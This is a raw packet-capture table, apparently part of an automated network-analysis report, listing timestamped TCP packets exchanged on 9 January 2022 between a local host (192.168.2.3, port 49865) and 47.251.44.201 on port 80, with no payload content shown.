Jan 9, 2022 18:48:50.312762976 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.312787056 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.312803030 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.312829018 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.312875032 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.312882900 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.312916040 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.312961102 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.313004971 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.313014030 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.313020945 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.313081026 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.313129902 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.313143015 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.313162088 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.313206911 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.313216925 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.313246012 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.313257933 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.313294888 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.313296080 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.313339949 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.313354015 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.313405037 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.313410044 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.313466072 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.313472986 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.313524008 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.313530922 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.313580990 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.313597918 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.313633919 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.313640118 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.313697100 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.313699961 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.313752890 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.313760042 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.313812017 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.313822031 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.313873053 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.313882113 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.313935041 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.313951969 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.313988924 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.313994884 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.314049006 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.314054012 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.314105034 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.314115047 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.314172029 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.314174891 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.314227104 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.314235926 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.314291954 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.314296961 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.314348936 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.314356089 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.314407110 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.314418077 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.314481020 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.314481020 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.314538002 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.314538956 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.314595938 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.314599991 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.314660072 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.314662933 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.314712048 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.314721107 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.314768076 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.314771891 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.314815998 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.314821959 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.314855099 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.314870119 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.314893961 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.314908028 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.314930916 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.314944029 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.314969063 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.314981937 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.315007925 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.315021038 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.315046072 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.315058947 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.315083981 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.315098047 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.315121889 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.315130949 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.315160990 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.315175056 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.315198898 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.315207958 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.315236092 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.315251112 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.315275908 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.315284014 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.315315008 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.315326929 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.315352917 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.315366030 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.315391064 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.315399885 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.315427065 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.315440893 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.315465927 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.315479994 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.315505028 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.315519094 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.315541983 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.315555096 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.315579891 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.315617085 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.315627098 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.315637112 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.315654039 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.315660954 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.315691948 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.315701962 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.315731049 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.315742970 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.315783024 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.315785885 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.315845966 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.333096981 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.333167076 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.333170891 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.333213091 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.333223104 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.333252907 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.333291054 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.333317995 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.333328009 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.333331108 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.333333015 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.333370924 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.333408117 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.333420992 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.333430052 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.333446980 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.333451033 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.333486080 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.333508968 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.333522081 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.333535910 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.333560944 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.333575964 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.333599091 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.333611965 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.333636999 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.333651066 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.333676100 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.333689928 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.333713055 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.333726883 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.333750963 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.333765030 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.333790064 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.333803892 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.333827972 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.333842993 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.333865881 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.333888054 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.333903074 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.333910942 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.333941936 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.333981037 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.334017038 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.334018946 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.334028006 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.334033966 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.334055901 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.334084988 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.334094048 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.334106922 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.334131956 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.334145069 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.334198952 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.496653080 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.496709108 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.496747017 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.496787071 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.496829033 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.496901989 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.496915102 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.496939898 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.496949911 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.496956110 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.496961117 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.496964931 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.496969938 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.496979952 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.496985912 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.497019053 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.497034073 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.497057915 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.497067928 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.497097969 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.497112036 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.497253895 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.516179085 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.516232014 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.516272068 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.516311884 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.516349077 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.516360998 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.516387939 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.516391993 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.516427040 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.516443014 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.516467094 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.516506910 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.516514063 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.516544104 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.516582012 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.516592026 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.516622066 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.516658068 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.516671896 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.516695976 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.516733885 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.516746044 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.516772032 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.516817093 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.516823053 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.516911983 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.516949892 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.516963959 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.516988039 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.517025948 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.517040014 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.517062902 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.517101049 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.517116070 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.517141104 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.517194033 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.517198086 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.517241955 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.517277956 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.517290115 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.517316103 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.517354012 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.517366886 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.517390013 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.517427921 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.517440081 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.517465115 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.517503023 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.517513037 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.517541885 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.517592907 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.517606020 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.517632008 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.517672062 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.517677069 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.517708063 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.517745972 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.517755032 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.517784119 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.517821074 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.517831087 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.517863035 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.517899036 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.517915964 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.517936945 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.517987013 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.517992020 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.518040895 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.518090010 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.518090010 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.518141031 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.518188000 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.518193960 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.518250942 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.518301964 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.518307924 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.518367052 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.518414021 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.518419981 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.518476009 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.518532038 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.518532991 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.518585920 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.518637896 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.518637896 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.518688917 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.518740892 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.518750906 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.518801928 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.518862963 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.518862963 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.518920898 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.518974066 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.518980980 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.519036055 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.519089937 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.519093990 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.519153118 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.519203901 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.519207001 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.519263983 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.519325018 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.519325972 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.519382000 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.519438028 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.519440889 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.519488096 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.519526958 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.519547939 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.519567013 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.519603014 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.519618034 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.519642115 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.519680977 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.519697905 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.519720078 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.519757986 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.519769907 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.519795895 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.519836903 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.519859076 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.519876003 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.519912958 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.519929886 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.519952059 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.519990921 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.520009041 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.520026922 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.520065069 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.520081043 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.520104885 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.520143986 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.520157099 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.520183086 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.520219088 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.520235062 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.520256996 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.520296097 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.520303965 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.520339966 CET	80	49865	47.251.44.201	192.168.2.3
